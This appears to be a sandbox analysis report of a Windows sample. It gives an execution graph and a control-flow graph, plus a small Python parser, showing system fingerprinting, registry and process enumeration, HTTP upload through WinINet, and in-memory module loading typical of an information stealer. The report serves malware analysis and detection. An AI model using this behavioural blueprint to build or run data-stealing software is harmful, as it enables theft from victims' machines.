lstrcpy 14963->14964 14965 c41cb2 14964->14965 14966 c4a9b0 4 API calls 14965->14966 14967 c41cd1 14966->14967 14968 c4a8a0 lstrcpy 14967->14968 14969 c41cda 14968->14969 14970 c4a9b0 4 API calls 14969->14970 14971 c41cfb 14970->14971 14972 c4a8a0 lstrcpy 14971->14972 14973 c41d04 14972->14973 14974 c47850 3 API calls 14973->14974 14975 c41d14 14974->14975 14976 c4a9b0 4 API calls 14975->14976 14977 c41d24 14976->14977 14978 c4a8a0 lstrcpy 14977->14978 14979 c41d2d 14978->14979 14980 c4a9b0 4 API calls 14979->14980 14981 c41d4c 14980->14981 14982 c4a8a0 lstrcpy 14981->14982 14983 c41d55 14982->14983 14984 c4a9b0 4 API calls 14983->14984 14985 c41d75 14984->14985 14986 c4a8a0 lstrcpy 14985->14986 14987 c41d7e 14986->14987 14988 c478e0 3 API calls 14987->14988 14989 c41d8e 14988->14989 14990 c4a9b0 4 API calls 14989->14990 14991 c41d9e 14990->14991 14992 c4a8a0 lstrcpy 14991->14992 14993 c41da7 14992->14993 14994 c4a9b0 4 API calls 14993->14994 14995 c41dc6 14994->14995 14996 c4a8a0 lstrcpy 
14995->14996 14997 c41dcf 14996->14997 14998 c4a9b0 4 API calls 14997->14998 14999 c41df0 14998->14999 15000 c4a8a0 lstrcpy 14999->15000 15001 c41df9 15000->15001 15660 c47980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15001->15660 15004 c4a9b0 4 API calls 15005 c41e19 15004->15005 15006 c4a8a0 lstrcpy 15005->15006 15007 c41e22 15006->15007 15008 c4a9b0 4 API calls 15007->15008 15009 c41e41 15008->15009 15010 c4a8a0 lstrcpy 15009->15010 15011 c41e4a 15010->15011 15012 c4a9b0 4 API calls 15011->15012 15013 c41e6b 15012->15013 15014 c4a8a0 lstrcpy 15013->15014 15015 c41e74 15014->15015 15662 c47a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15015->15662 15018 c4a9b0 4 API calls 15019 c41e94 15018->15019 15020 c4a8a0 lstrcpy 15019->15020 15021 c41e9d 15020->15021 15022 c4a9b0 4 API calls 15021->15022 15023 c41ebc 15022->15023 15024 c4a8a0 lstrcpy 15023->15024 15025 c41ec5 15024->15025 15026 c4a9b0 4 API calls 15025->15026 15027 c41ee5 15026->15027 15028 c4a8a0 lstrcpy 15027->15028 15029 c41eee 15028->15029 15665 c47b00 GetUserDefaultLocaleName 15029->15665 15032 c4a9b0 4 API calls 15033 c41f0e 15032->15033 15034 c4a8a0 lstrcpy 15033->15034 15035 c41f17 15034->15035 15036 c4a9b0 4 API calls 15035->15036 15037 c41f36 15036->15037 15038 c4a8a0 lstrcpy 15037->15038 15039 c41f3f 15038->15039 15040 c4a9b0 4 API calls 15039->15040 15041 c41f60 15040->15041 15042 c4a8a0 lstrcpy 15041->15042 15043 c41f69 15042->15043 15669 c47b90 15043->15669 15045 c41f80 15046 c4a920 3 API calls 15045->15046 15047 c41f93 15046->15047 15048 c4a8a0 lstrcpy 15047->15048 15049 c41f9c 15048->15049 15050 c4a9b0 4 API calls 15049->15050 15051 c41fc6 15050->15051 15052 c4a8a0 lstrcpy 15051->15052 15053 c41fcf 15052->15053 15054 c4a9b0 4 API calls 15053->15054 15055 c41fef 15054->15055 15056 c4a8a0 lstrcpy 15055->15056 15057 c41ff8 15056->15057 15681 c47d80 GetSystemPowerStatus 15057->15681 15060 c4a9b0 4 API calls 15061 c42018 15060->15061 15062 c4a8a0 lstrcpy 15061->15062 15063 
c42021 15062->15063 15064 c4a9b0 4 API calls 15063->15064 15065 c42040 15064->15065 15066 c4a8a0 lstrcpy 15065->15066 15067 c42049 15066->15067 15068 c4a9b0 4 API calls 15067->15068 15069 c4206a 15068->15069 15070 c4a8a0 lstrcpy 15069->15070 15071 c42073 15070->15071 15072 c4207e GetCurrentProcessId 15071->15072 15683 c49470 OpenProcess 15072->15683 15075 c4a920 3 API calls 15076 c420a4 15075->15076 15077 c4a8a0 lstrcpy 15076->15077 15078 c420ad 15077->15078 15079 c4a9b0 4 API calls 15078->15079 15080 c420d7 15079->15080 15081 c4a8a0 lstrcpy 15080->15081 15082 c420e0 15081->15082 15083 c4a9b0 4 API calls 15082->15083 15084 c42100 15083->15084 15085 c4a8a0 lstrcpy 15084->15085 15086 c42109 15085->15086 15688 c47e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15086->15688 15089 c4a9b0 4 API calls 15090 c42129 15089->15090 15091 c4a8a0 lstrcpy 15090->15091 15092 c42132 15091->15092 15093 c4a9b0 4 API calls 15092->15093 15094 c42151 15093->15094 15095 c4a8a0 lstrcpy 15094->15095 15096 c4215a 15095->15096 15097 c4a9b0 4 API calls 15096->15097 15098 c4217b 15097->15098 15099 c4a8a0 lstrcpy 15098->15099 15100 c42184 15099->15100 15692 c47f60 15100->15692 15103 c4a9b0 4 API calls 15104 c421a4 15103->15104 15105 c4a8a0 lstrcpy 15104->15105 15106 c421ad 15105->15106 15107 c4a9b0 4 API calls 15106->15107 15108 c421cc 15107->15108 15109 c4a8a0 lstrcpy 15108->15109 15110 c421d5 15109->15110 15111 c4a9b0 4 API calls 15110->15111 15112 c421f6 15111->15112 15113 c4a8a0 lstrcpy 15112->15113 15114 c421ff 15113->15114 15705 c47ed0 GetSystemInfo wsprintfA 15114->15705 15117 c4a9b0 4 API calls 15118 c4221f 15117->15118 15119 c4a8a0 lstrcpy 15118->15119 15120 c42228 15119->15120 15121 c4a9b0 4 API calls 15120->15121 15122 c42247 15121->15122 15123 c4a8a0 lstrcpy 15122->15123 15124 c42250 15123->15124 15125 c4a9b0 4 API calls 15124->15125 15126 c42270 15125->15126 15127 c4a8a0 lstrcpy 15126->15127 15128 c42279 15127->15128 15707 c48100 GetProcessHeap RtlAllocateHeap 15128->15707 15131 
c4a9b0 4 API calls 15132 c42299 15131->15132 15133 c4a8a0 lstrcpy 15132->15133 15134 c422a2 15133->15134 15135 c4a9b0 4 API calls 15134->15135 15136 c422c1 15135->15136 15137 c4a8a0 lstrcpy 15136->15137 15138 c422ca 15137->15138 15139 c4a9b0 4 API calls 15138->15139 15140 c422eb 15139->15140 15141 c4a8a0 lstrcpy 15140->15141 15142 c422f4 15141->15142 15713 c487c0 15142->15713 15145 c4a920 3 API calls 15146 c4231e 15145->15146 15147 c4a8a0 lstrcpy 15146->15147 15148 c42327 15147->15148 15149 c4a9b0 4 API calls 15148->15149 15150 c42351 15149->15150 15151 c4a8a0 lstrcpy 15150->15151 15152 c4235a 15151->15152 15153 c4a9b0 4 API calls 15152->15153 15154 c4237a 15153->15154 15155 c4a8a0 lstrcpy 15154->15155 15156 c42383 15155->15156 15157 c4a9b0 4 API calls 15156->15157 15158 c423a2 15157->15158 15159 c4a8a0 lstrcpy 15158->15159 15160 c423ab 15159->15160 15718 c481f0 15160->15718 15162 c423c2 15163 c4a920 3 API calls 15162->15163 15164 c423d5 15163->15164 15165 c4a8a0 lstrcpy 15164->15165 15166 c423de 15165->15166 15167 c4a9b0 4 API calls 15166->15167 15168 c4240a 15167->15168 15169 c4a8a0 lstrcpy 15168->15169 15170 c42413 15169->15170 15171 c4a9b0 4 API calls 15170->15171 15172 c42432 15171->15172 15173 c4a8a0 lstrcpy 15172->15173 15174 c4243b 15173->15174 15175 c4a9b0 4 API calls 15174->15175 15176 c4245c 15175->15176 15177 c4a8a0 lstrcpy 15176->15177 15178 c42465 15177->15178 15179 c4a9b0 4 API calls 15178->15179 15180 c42484 15179->15180 15181 c4a8a0 lstrcpy 15180->15181 15182 c4248d 15181->15182 15183 c4a9b0 4 API calls 15182->15183 15184 c424ae 15183->15184 15185 c4a8a0 lstrcpy 15184->15185 15186 c424b7 15185->15186 15726 c48320 15186->15726 15188 c424d3 15189 c4a920 3 API calls 15188->15189 15190 c424e6 15189->15190 15191 c4a8a0 lstrcpy 15190->15191 15192 c424ef 15191->15192 15193 c4a9b0 4 API calls 15192->15193 15194 c42519 15193->15194 15195 c4a8a0 lstrcpy 15194->15195 15196 c42522 15195->15196 15197 c4a9b0 4 API calls 15196->15197 15198 c42543 15197->15198 
15199 c4a8a0 lstrcpy 15198->15199 15200 c4254c 15199->15200 15201 c48320 17 API calls 15200->15201 15202 c42568 15201->15202 15203 c4a920 3 API calls 15202->15203 15204 c4257b 15203->15204 15205 c4a8a0 lstrcpy 15204->15205 15206 c42584 15205->15206 15207 c4a9b0 4 API calls 15206->15207 15208 c425ae 15207->15208 15209 c4a8a0 lstrcpy 15208->15209 15210 c425b7 15209->15210 15211 c4a9b0 4 API calls 15210->15211 15212 c425d6 15211->15212 15213 c4a8a0 lstrcpy 15212->15213 15214 c425df 15213->15214 15215 c4a9b0 4 API calls 15214->15215 15216 c42600 15215->15216 15217 c4a8a0 lstrcpy 15216->15217 15218 c42609 15217->15218 15762 c48680 15218->15762 15220 c42620 15221 c4a920 3 API calls 15220->15221 15222 c42633 15221->15222 15223 c4a8a0 lstrcpy 15222->15223 15224 c4263c 15223->15224 15225 c4265a lstrlen 15224->15225 15226 c4266a 15225->15226 15227 c4a740 lstrcpy 15226->15227 15228 c4267c 15227->15228 15229 c31590 lstrcpy 15228->15229 15230 c4268d 15229->15230 15772 c45190 15230->15772 15232 c42699 15232->13663 15960 c4aad0 15233->15960 15235 c35009 InternetOpenUrlA 15239 c35021 15235->15239 15236 c350a0 InternetCloseHandle InternetCloseHandle 15238 c350ec 15236->15238 15237 c3502a InternetReadFile 15237->15239 15238->13667 15239->15236 15239->15237 15961 c398d0 15240->15961 15242 c40759 15243 c4077d 15242->15243 15244 c40a38 15242->15244 15247 c40799 StrCmpCA 15243->15247 15245 c31590 lstrcpy 15244->15245 15246 c40a49 15245->15246 16137 c40250 15246->16137 15249 c407a8 15247->15249 15250 c40843 15247->15250 15252 c4a7a0 lstrcpy 15249->15252 15253 c40865 StrCmpCA 15250->15253 15254 c407c3 15252->15254 15255 c40874 15253->15255 15292 c4096b 15253->15292 15256 c31590 lstrcpy 15254->15256 15257 c4a740 lstrcpy 15255->15257 15258 c4080c 15256->15258 15260 c40881 15257->15260 15261 c4a7a0 lstrcpy 15258->15261 15259 c4099c StrCmpCA 15262 c40a2d 15259->15262 15263 c409ab 15259->15263 15264 c4a9b0 4 API calls 15260->15264 15265 c40823 15261->15265 15262->13671 15266 c31590 lstrcpy 
15263->15266 15267 c408ac 15264->15267 15268 c4a7a0 lstrcpy 15265->15268 15269 c409f4 15266->15269 15270 c4a920 3 API calls 15267->15270 15271 c4083e 15268->15271 15273 c4a7a0 lstrcpy 15269->15273 15274 c408b3 15270->15274 15964 c3fb00 15271->15964 15275 c40a0d 15273->15275 15276 c4a9b0 4 API calls 15274->15276 15277 c4a7a0 lstrcpy 15275->15277 15278 c408ba 15276->15278 15279 c40a28 15277->15279 15292->15259 15612 c4a7a0 lstrcpy 15611->15612 15613 c31683 15612->15613 15614 c4a7a0 lstrcpy 15613->15614 15615 c31695 15614->15615 15616 c4a7a0 lstrcpy 15615->15616 15617 c316a7 15616->15617 15618 c4a7a0 lstrcpy 15617->15618 15619 c315a3 15618->15619 15619->14494 15621 c347c6 15620->15621 15622 c34838 lstrlen 15621->15622 15646 c4aad0 15622->15646 15624 c34848 InternetCrackUrlA 15625 c34867 15624->15625 15625->14571 15627 c34eee 15626->15627 15628 c39af9 LocalAlloc 15626->15628 15627->14593 15627->14596 15628->15627 15629 c39b14 CryptStringToBinaryA 15628->15629 15629->15627 15630 c39b39 LocalFree 15629->15630 15630->15627 15632 c4a740 lstrcpy 15631->15632 15633 c48b74 15632->15633 15634 c4a740 lstrcpy 15633->15634 15635 c48b82 GetSystemTime 15634->15635 15636 c48b99 15635->15636 15637 c4a7a0 lstrcpy 15636->15637 15638 c48bfc 15637->15638 15638->14587 15640 c4a931 15639->15640 15641 c4a988 15640->15641 15643 c4a968 lstrcpy lstrcat 15640->15643 15642 c4a7a0 lstrcpy 15641->15642 15644 c4a994 15642->15644 15643->15641 15644->14590 15645->14705 15646->15624 15647->14715 15648->14856 15649->14858 15650->14866 15779 c477a0 15651->15779 15654 c476c6 RegOpenKeyExA 15656 c47704 RegCloseKey 15654->15656 15657 c476e7 RegQueryValueExA 15654->15657 15655 c41c1e 15655->14948 15656->15655 15657->15656 15659 c41c99 15658->15659 15659->14962 15661 c41e09 15660->15661 15661->15004 15663 c47a9a wsprintfA 15662->15663 15664 c41e84 15662->15664 15663->15664 15664->15018 15666 c41efe 15665->15666 15667 c47b4d 15665->15667 15666->15032 15786 c48d20 LocalAlloc CharToOemW 15667->15786 15670 
c4a740 lstrcpy 15669->15670 15671 c47bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15670->15671 15680 c47c25 15671->15680 15672 c47c46 GetLocaleInfoA 15672->15680 15673 c47d18 15674 c47d1e LocalFree 15673->15674 15675 c47d28 15673->15675 15674->15675 15677 c4a7a0 lstrcpy 15675->15677 15676 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15676->15680 15679 c47d37 15677->15679 15678 c4a8a0 lstrcpy 15678->15680 15679->15045 15680->15672 15680->15673 15680->15676 15680->15678 15682 c42008 15681->15682 15682->15060 15684 c494b5 15683->15684 15685 c49493 GetModuleFileNameExA CloseHandle 15683->15685 15686 c4a740 lstrcpy 15684->15686 15685->15684 15687 c42091 15686->15687 15687->15075 15689 c42119 15688->15689 15690 c47e68 RegQueryValueExA 15688->15690 15689->15089 15691 c47e8e RegCloseKey 15690->15691 15691->15689 15693 c47fb9 GetLogicalProcessorInformationEx 15692->15693 15694 c47fd8 GetLastError 15693->15694 15696 c48029 15693->15696 15700 c47fe3 15694->15700 15704 c48022 15694->15704 15699 c489f0 2 API calls 15696->15699 15698 c489f0 2 API calls 15701 c42194 15698->15701 15702 c4807b 15699->15702 15700->15693 15700->15701 15787 c489f0 15700->15787 15790 c48a10 GetProcessHeap RtlAllocateHeap 15700->15790 15701->15103 15703 c48084 wsprintfA 15702->15703 15702->15704 15703->15701 15704->15698 15704->15701 15706 c4220f 15705->15706 15706->15117 15708 c489b0 15707->15708 15709 c4814d GlobalMemoryStatusEx 15708->15709 15710 c48163 __aulldiv 15709->15710 15711 c4819b wsprintfA 15710->15711 15712 c42289 15711->15712 15712->15131 15714 c487fb GetProcessHeap RtlAllocateHeap wsprintfA 15713->15714 15716 c4a740 lstrcpy 15714->15716 15717 c4230b 15716->15717 15717->15145 15719 c4a740 lstrcpy 15718->15719 15723 c48229 15719->15723 15720 c48263 15722 c4a7a0 lstrcpy 15720->15722 15721 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15721->15723 15724 c482dc 15722->15724 15723->15720 15723->15721 15725 c4a8a0 lstrcpy 15723->15725 15724->15162 15725->15723 15727 c4a740 lstrcpy 15726->15727 
15728 c4835c RegOpenKeyExA 15727->15728 15729 c483ae 15728->15729 15731 c483d0 15728->15731 15730 c4a7a0 lstrcpy 15729->15730 15742 c483bd 15730->15742 15732 c48613 RegCloseKey 15731->15732 15733 c483f8 RegEnumKeyExA 15731->15733 15734 c4a7a0 lstrcpy 15732->15734 15735 c4860e 15733->15735 15736 c4843f wsprintfA RegOpenKeyExA 15733->15736 15734->15742 15735->15732 15737 c48485 RegCloseKey RegCloseKey 15736->15737 15738 c484c1 RegQueryValueExA 15736->15738 15739 c4a7a0 lstrcpy 15737->15739 15740 c48601 RegCloseKey 15738->15740 15741 c484fa lstrlen 15738->15741 15739->15742 15740->15735 15741->15740 15743 c48510 15741->15743 15742->15188 15744 c4a9b0 4 API calls 15743->15744 15745 c48527 15744->15745 15746 c4a8a0 lstrcpy 15745->15746 15747 c48533 15746->15747 15748 c4a9b0 4 API calls 15747->15748 15749 c48557 15748->15749 15750 c4a8a0 lstrcpy 15749->15750 15751 c48563 15750->15751 15752 c4856e RegQueryValueExA 15751->15752 15752->15740 15753 c485a3 15752->15753 15754 c4a9b0 4 API calls 15753->15754 15755 c485ba 15754->15755 15756 c4a8a0 lstrcpy 15755->15756 15757 c485c6 15756->15757 15758 c4a9b0 4 API calls 15757->15758 15759 c485ea 15758->15759 15760 c4a8a0 lstrcpy 15759->15760 15761 c485f6 15760->15761 15761->15740 15763 c4a740 lstrcpy 15762->15763 15764 c486bc CreateToolhelp32Snapshot Process32First 15763->15764 15765 c4875d CloseHandle 15764->15765 15766 c486e8 Process32Next 15764->15766 15767 c4a7a0 lstrcpy 15765->15767 15766->15765 15768 c486fd 15766->15768 15769 c48776 15767->15769 15768->15766 15770 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15768->15770 15771 c4a8a0 lstrcpy 15768->15771 15769->15220 15770->15768 15771->15768 15773 c4a7a0 lstrcpy 15772->15773 15774 c451b5 15773->15774 15775 c31590 lstrcpy 15774->15775 15776 c451c6 15775->15776 15791 c35100 15776->15791 15778 c451cf 15778->15232 15782 c47720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15779->15782 15781 c476b9 15781->15654 15781->15655 15783 c47765 RegQueryValueExA 15782->15783 15784 c47780 
RegCloseKey 15782->15784 15783->15784 15785 c47793 15784->15785 15785->15781 15786->15666 15788 c48a0c 15787->15788 15789 c489f9 GetProcessHeap HeapFree 15787->15789 15788->15700 15789->15788 15790->15700 15792 c4a7a0 lstrcpy 15791->15792 15793 c35119 15792->15793 15794 c347b0 2 API calls 15793->15794 15795 c35125 15794->15795 15951 c48ea0 15795->15951 15797 c35184 15798 c35192 lstrlen 15797->15798 15799 c351a5 15798->15799 15800 c48ea0 4 API calls 15799->15800 15801 c351b6 15800->15801 15802 c4a740 lstrcpy 15801->15802 15803 c351c9 15802->15803 15804 c4a740 lstrcpy 15803->15804 15805 c351d6 15804->15805 15806 c4a740 lstrcpy 15805->15806 15807 c351e3 15806->15807 15808 c4a740 lstrcpy 15807->15808 15809 c351f0 15808->15809 15810 c4a740 lstrcpy 15809->15810 15811 c351fd InternetOpenA StrCmpCA 15810->15811 15812 c3522f 15811->15812 15813 c358c4 InternetCloseHandle 15812->15813 15814 c48b60 3 API calls 15812->15814 15820 c358d9 codecvt 15813->15820 15815 c3524e 15814->15815 15816 c4a920 3 API calls 15815->15816 15817 c35261 15816->15817 15818 c4a8a0 lstrcpy 15817->15818 15819 c3526a 15818->15819 15821 c4a9b0 4 API calls 15819->15821 15824 c4a7a0 lstrcpy 15820->15824 15822 c352ab 15821->15822 15823 c4a920 3 API calls 15822->15823 15825 c352b2 15823->15825 15831 c35913 15824->15831 15826 c4a9b0 4 API calls 15825->15826 15827 c352b9 15826->15827 15828 c4a8a0 lstrcpy 15827->15828 15829 c352c2 15828->15829 15830 c4a9b0 4 API calls 15829->15830 15832 c35303 15830->15832 15831->15778 15833 c4a920 3 API calls 15832->15833 15834 c3530a 15833->15834 15835 c4a8a0 lstrcpy 15834->15835 15836 c35313 15835->15836 15837 c35329 InternetConnectA 15836->15837 15837->15813 15838 c35359 HttpOpenRequestA 15837->15838 15840 c358b7 InternetCloseHandle 15838->15840 15841 c353b7 15838->15841 15840->15813 15842 c4a9b0 4 API calls 15841->15842 15843 c353cb 15842->15843 15844 c4a8a0 lstrcpy 15843->15844 15845 c353d4 15844->15845 15846 c4a920 3 API calls 15845->15846 15847 c353f2 15846->15847 15848 
c4a8a0 lstrcpy 15847->15848 15849 c353fb 15848->15849 15850 c4a9b0 4 API calls 15849->15850 15851 c3541a 15850->15851 15852 c4a8a0 lstrcpy 15851->15852 15853 c35423 15852->15853 15854 c4a9b0 4 API calls 15853->15854 15855 c35444 15854->15855 15856 c4a8a0 lstrcpy 15855->15856 15857 c3544d 15856->15857 15858 c4a9b0 4 API calls 15857->15858 15859 c3546e 15858->15859 15860 c4a8a0 lstrcpy 15859->15860 15952 c48ead CryptBinaryToStringA 15951->15952 15956 c48ea9 15951->15956 15953 c48ece GetProcessHeap RtlAllocateHeap 15952->15953 15952->15956 15954 c48ef4 codecvt 15953->15954 15953->15956 15955 c48f05 CryptBinaryToStringA 15954->15955 15955->15956 15956->15797 15960->15235 16203 c39880 15961->16203 15963 c398e1 15963->15242 15965 c4a740 lstrcpy 15964->15965 16138 c4a740 lstrcpy 16137->16138 16139 c40266 16138->16139 16140 c48de0 2 API calls 16139->16140 16141 c4027b 16140->16141 16142 c4a920 3 API calls 16141->16142 16143 c4028b 16142->16143 16144 c4a8a0 lstrcpy 16143->16144 16145 c40294 16144->16145 16146 c4a9b0 4 API calls 16145->16146 16147 c402b8 16146->16147 16204 c3988d 16203->16204 16207 c36fb0 16204->16207 16206 c398ad codecvt 16206->15963 16210 c36d40 16207->16210 16211 c36d63 16210->16211 16220 c36d59 16210->16220 16226 c36530 16211->16226 16215 c36dbe 16215->16220 16236 c369b0 16215->16236 16217 c36e2a 16218 c36ee6 VirtualFree 16217->16218 16217->16220 16221 c36ef7 16217->16221 16218->16221 16219 c36f41 16219->16220 16222 c489f0 2 API calls 16219->16222 16220->16206 16221->16219 16223 c36f26 FreeLibrary 16221->16223 16224 c36f38 16221->16224 16222->16220 16223->16221 16225 c489f0 2 API calls 16224->16225 16225->16219 16227 c36542 16226->16227 16229 c36549 16227->16229 16246 c48a10 GetProcessHeap RtlAllocateHeap 16227->16246 16229->16220 16230 c36660 16229->16230 16235 c3668f VirtualAlloc 16230->16235 16232 c36730 16233 c36743 VirtualAlloc 16232->16233 16234 c3673c 16232->16234 16233->16234 16234->16215 16235->16232 16235->16234 16237 c369c9 16236->16237 16240 
c369d5 16236->16240 16238 c36a09 LoadLibraryA 16237->16238 16237->16240 16239 c36a32 16238->16239 16238->16240 16243 c36ae0 16239->16243 16247 c48a10 GetProcessHeap RtlAllocateHeap 16239->16247 16240->16217 16242 c36ba8 GetProcAddress 16242->16240 16242->16243 16243->16240 16243->16242 16244 c489f0 2 API calls 16244->16243 16245 c36a8b 16245->16240 16245->16244 16246->16229 16247->16245
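The execution-graph dump above is a flat token stream: `<id> <address> [label ...]` defines a node (labels are API names, or a count such as "2 API calls"), and `<a>-><b>` defines an edge. The following Python is an added example, not part of the Joe Sandbox report: it parses that format and checks that the WinINet request chain of the function at c34899 (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile) is actually connected along graph edges. The embedded sample is a constructed, trimmed excerpt of the dump: the run of lstrcpy/string-building nodes between 14583 and 14627 is elided and a single edge 14583->14627 stands in for it.

```python
"""Parse a Joe Sandbox execution-graph token dump and check that the
WinINet request chain is connected along graph edges.

Added example, not part of the report.  Grammar assumed from the dump:
  <id> <hex address> [label ...]   defines a node (labels = API names
                                   or a count such as "2 API calls")
  <id>-><id>                       defines a directed edge
"""
import re
from collections import deque

# Trimmed excerpt of the dump above (constructed for this example): only
# nodes on the request path of the function at c34899 are kept.  The run
# of lstrcpy / string-building nodes between 14583 and 14627 is elided
# and the single edge 14583->14627 stands in for it.
SAMPLE = (
    "14580 c4a740 lstrcpy 14579->14580 14581 c3490b InternetOpenA StrCmpCA "
    "14580->14581 14582 c34944 14581->14582 14583 c34955 14582->14583 "
    "14584 c34ecb InternetCloseHandle 14582->14584 15631 c48b60 14583->15631 "
    "14586 c34ee8 14584->14586 15626 c39ac0 CryptStringToBinaryA 14586->15626 "
    "14627 c34a8d 14583->14627 14628 c34aa3 InternetConnectA 14627->14628 "
    "14628->14584 14629 c34ad3 HttpOpenRequestA 14628->14629 14631 c34b28 "
    "14629->14631 14632 c34ebe InternetCloseHandle 14629->14632 14632->14584 "
    "14705 c34e13 HttpSendRequestA 14631->14705 14706 c34e32 InternetReadFile "
    "14705->14706 14707 c34e67 InternetCloseHandle 14706->14707 14712 c34e5e "
    "14706->14712 14712->14706 14712->14707 14709 c4a800 14707->14709"
)

EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{4,8}$")


def parse_graph(dump):
    """Return (nodes, edges): nodes maps id -> (address, [labels]),
    edges maps id -> set of successor ids."""
    nodes, edges = {}, {}
    tokens = dump.split()
    cur = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.setdefault(m.group(1), set()).add(m.group(2))
            i += 1
            continue
        # A node starts with an id immediately followed by a hex address;
        # a bare count like the "2" in "2 API calls" is followed by "API",
        # so it is kept as a label of the current node instead.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = tok
            nodes[cur] = (tokens[i + 1], [])
            i += 2
            continue
        if cur is not None:
            nodes[cur][1].append(tok)
        i += 1
    return nodes, edges


def reachable(edges, start):
    """All node ids reachable from start by following edges (BFS)."""
    seen, todo = set(), deque([start])
    while todo:
        n = todo.popleft()
        for succ in edges.get(n, ()):
            if succ not in seen:
                seen.add(succ)
                todo.append(succ)
    return seen


WININET_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile"]


def find_request_chain(dump, chain=WININET_CHAIN):
    """Return [(node id, address)], one node per API in `chain`, such that
    each node is reachable from the previous one; None if an API is
    missing or not reachable in that order."""
    nodes, edges = parse_graph(dump)
    path, frontier = [], None
    for api in chain:
        candidates = {nid for nid, (_, labels) in nodes.items() if api in labels}
        if frontier is not None:
            candidates &= reachable(edges, frontier)
        if not candidates:
            return None
        frontier = min(candidates)  # deterministic choice among candidates
        path.append((frontier, nodes[frontier][0]))
    return path


if __name__ == "__main__":
    for nid, addr in find_request_chain(SAMPLE) or []:
        print(nid, addr)
```

On the excerpt the chain resolves to nodes 14581 (c3490b), 14628 (c34aa3), 14629 (c34ad3), 14705 (c34e13) and 14706 (c34e32), i.e. one complete request round-trip; the same parser run over the full dump also exposes the second copy of the pattern in the function at c35979 (nodes 14743, 14789, 14790, 14866, 14867) and the third in c35100.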

Control-flow Graph

(The rendered graph colours blocks as Executed / Not Executed; that colouring is not preserved in this text export. Below is the graph of the function at c49860 as a block list, with each block's address range, API labels and successors.)

block 660  c49860-c49874  call c49750                       -> 663, 664
block 664  c4987a-c49a8e  call c49780; GetProcAddress * 21  -> 663
block 663  c49a93-c49af2  LoadLibraryA * 5                  -> 665, 666
block 665  c49af4-c49b08  GetProcAddress                    -> 666
block 666  c49b0d-c49b14                                    -> 668, 669
block 669  c49b16-c49b41  GetProcAddress * 2                -> 668
block 668  c49b46-c49b4d                                    -> 671, 672
block 671  c49b4f-c49b63  GetProcAddress                    -> 672
block 672  c49b68-c49b6f                                    -> 673, 674
block 673  c49b71-c49b84  GetProcAddress                    -> 674
block 674  c49b89-c49b90                                    -> 675, 676
block 676  c49b92-c49bbc  GetProcAddress * 2                -> 675
block 675  c49bc1-c49bc2  (end)
                                APIs
                                • GetProcAddress.KERNEL32(77190000,019F1750), ref: 00C498A1
                                • GetProcAddress.KERNEL32(77190000,019F1768), ref: 00C498BA
                                • GetProcAddress.KERNEL32(77190000,019F1600), ref: 00C498D2
                                • GetProcAddress.KERNEL32(77190000,019F1780), ref: 00C498EA
                                • GetProcAddress.KERNEL32(77190000,019F15A0), ref: 00C49903
                                • GetProcAddress.KERNEL32(77190000,019F8AB8), ref: 00C4991B
                                • GetProcAddress.KERNEL32(77190000,019E52E8), ref: 00C49933
                                • GetProcAddress.KERNEL32(77190000,019E5228), ref: 00C4994C
                                • GetProcAddress.KERNEL32(77190000,019F15E8), ref: 00C49964
                                • GetProcAddress.KERNEL32(77190000,019F17C8), ref: 00C4997C
                                • GetProcAddress.KERNEL32(77190000,019F1630), ref: 00C49995
                                • GetProcAddress.KERNEL32(77190000,019F1660), ref: 00C499AD
                                • GetProcAddress.KERNEL32(77190000,019E5368), ref: 00C499C5
                                • GetProcAddress.KERNEL32(77190000,019F1690), ref: 00C499DE
                                • GetProcAddress.KERNEL32(77190000,019F16A8), ref: 00C499F6
                                • GetProcAddress.KERNEL32(77190000,019E4FA8), ref: 00C49A0E
                                • GetProcAddress.KERNEL32(77190000,019F1798), ref: 00C49A27
                                • GetProcAddress.KERNEL32(77190000,019F17B0), ref: 00C49A3F
                                • GetProcAddress.KERNEL32(77190000,019E4FE8), ref: 00C49A57
                                • GetProcAddress.KERNEL32(77190000,019F17F8), ref: 00C49A70
                                • GetProcAddress.KERNEL32(77190000,019E4FC8), ref: 00C49A88
                                • LoadLibraryA.KERNEL32(019F1828,?,00C46A00), ref: 00C49A9A
                                • LoadLibraryA.KERNEL32(019F1858,?,00C46A00), ref: 00C49AAB
                                • LoadLibraryA.KERNEL32(019F1870,?,00C46A00), ref: 00C49ABD
                                • LoadLibraryA.KERNEL32(019F1840,?,00C46A00), ref: 00C49ACF
                                • LoadLibraryA.KERNEL32(019F1810,?,00C46A00), ref: 00C49AE0
                                • GetProcAddress.KERNEL32(76850000,019F1888), ref: 00C49B02
                                • GetProcAddress.KERNEL32(77040000,019F18A0), ref: 00C49B23
                                • GetProcAddress.KERNEL32(77040000,019F18B8), ref: 00C49B3B
                                • GetProcAddress.KERNEL32(75A10000,019F8D20), ref: 00C49B5D
                                • GetProcAddress.KERNEL32(75690000,019E52A8), ref: 00C49B7E
                                • GetProcAddress.KERNEL32(776F0000,019F8B88), ref: 00C49B9F
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00C49BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00C49BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
